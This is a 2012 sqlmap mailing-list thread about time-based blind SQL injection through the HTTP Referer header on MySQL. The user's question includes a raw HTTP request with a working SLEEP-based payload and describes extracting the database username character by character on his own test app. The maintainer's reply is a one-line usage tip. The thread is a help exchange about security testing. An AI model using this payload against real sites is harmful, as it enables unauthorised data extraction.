Re: [sqlmap-users] sqlmap SQL blind time-based injection (MySQL)

Tue, 09 Oct 2012 01:26:58 -0700 

Hi Alton.

Please update to the latest revision and run sqlmap with the: -p referer.

Kind regards,
Miroslav Stampar

On Sun, Oct 7, 2012 at 11:25 PM, Alton Johnson <alton...@gmail.com> wrote:

> In my situation, my vulnerable parameter is Referer in the HTTP
> headers. I am able to enumerate the username and database name
> manually, but can someone explain or point me to an article that gives
> details about sqlmap and time-based with mysql? Here is an example of
> how I was able to enumerate the name. I'm unsure if there's any
> "custom" way of getting sqlmap work with this.
>
> Code:
> GET /vulnwebapp/index.php?id=2 HTTP/1.1
> Host: 192.168.127.133
> Proxy-Connection: keep-alive
> User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML,
> like Gecko) Chrome/22.0.1229.79 Safari/537.4
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Referer: '+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+'
> Accept-Encoding: gzip,deflate,sdch
> Accept-Language: en-US,en;q=0.8
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
>
> FYI, I'm testing this on a vulnerable web app hosted by myself. So
> with the above request, the page sleeps because the first character of
> the current username is "r", which eventually allows me to change 1,1
> to 2,1 and so forth until I figure out that the username is "root."
>
> Is there any way to get sqlmap to assist with this type of attack?
>
> Thanks,
>
>
> ------------------------------------------------------------------------------
> Don't let slow site performance ruin your business. Deploy New Relic APM
> Deploy New Relic app performance management and know exactly
> what is happening inside your Ruby, Python, PHP, Java, and .NET app
> Try New Relic at no cost today and get our sweet Data Nerd shirt too!
> http://p.sf.net/sfu/newrelic-dev2dev
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

------------------------------------------------------------------------------
Don't let slow site performance ruin your business. Deploy New Relic APM
Deploy New Relic app performance management and know exactly
what is happening inside your Ruby, Python, PHP, Java, and .NET app
Try New Relic at no cost today and get our sweet Data Nerd shirt too!
http://p.sf.net/sfu/newrelic-dev2dev
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to